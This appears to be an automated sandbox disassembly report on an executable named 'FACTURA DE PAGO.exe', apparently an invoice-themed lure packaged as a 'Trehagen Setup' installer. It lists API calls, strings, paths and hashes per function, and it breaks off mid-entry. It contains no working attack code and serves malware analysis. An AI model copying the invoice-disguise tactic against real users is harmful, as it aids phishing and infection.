Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 222337774-4148678300
Opcode ID: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
Opcode Fuzzy Hash: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD

Function 00405F9A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
CharNextA.USER32(?,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014

Strings

*?|<>/":, xrefs: 00405FE2
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
"C:\Users\user\Desktop\FACTURA DE PAGO.exe", xrefs: 00405FD6

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\FACTURA DE PAGO.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2987556050
Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D

Function 00403F7B Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403F98
GetSysColor.USER32(00000000), ref: 00403FB4
SetTextColor.GDI32(?,00000000), ref: 00403FC0
SetBkMode.GDI32(?,?), ref: 00403FCC
GetSysColor.USER32(?), ref: 00403FDF
SetBkColor.GDI32(?,?), ref: 00403FEF
DeleteObject.GDI32(?), ref: 00404009
CreateBrushIndirect.GDI32(?), ref: 00404013

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55

Function 00404F48 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8

Function 00404813 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
GetMessagePos.USER32 ref: 00404836
ScreenToClient.USER32(?,?), ref: 00404850
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888

Strings

f, xrefs: 00404864

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5

Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
MulDiv.KERNEL32(000D6EBB,00000064,000D6EBF), ref: 00402BC5
wsprintfA.USER32 ref: 00402BD5
SetWindowTextA.USER32(?,?), ref: 00402BE5
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7

Strings

verifying installer: %d%%, xrefs: 00402BCF

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59

Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
GlobalFree.KERNEL32(?), ref: 0040276F
GlobalFree.KERNEL32(00000000), ref: 00402782
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
Opcode Fuzzy Hash: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9

Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
RegCloseKey.ADVAPI32(?), ref: 00402AE0
RegCloseKey.ADVAPI32(?), ref: 00402B05
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69

Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CE2
GetClientRect.USER32(00000000,?), ref: 00401CEF
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
DeleteObject.GDI32(00000000), ref: 00401D2D

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
Opcode Fuzzy Hash: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79

Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D3B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
ReleaseDC.USER32(?,00000000), ref: 00401D68
CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F

Function 00404709 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
wsprintfA.USER32 ref: 004047AF
SetDlgItemTextA.USER32(?,00429868), ref: 004047C2

Strings

%u.%u%s%s, xrefs: 00404791

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8

Function 00403974 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,Trehagen Setup), ref: 00403A0C

Strings

1033, xrefs: 00403978, 00403982, 004039F3
Trehagen Setup, xrefs: 004039FB
"C:\Users\user\Desktop\FACTURA DE PAGO.exe", xrefs: 00403975

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\FACTURA DE PAGO.exe"$1033$Trehagen Setup
API String ID: 530164218-764001135
Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9

Function 004057A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
lstrcatA.KERNEL32(?,00409014), ref: 004057C1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
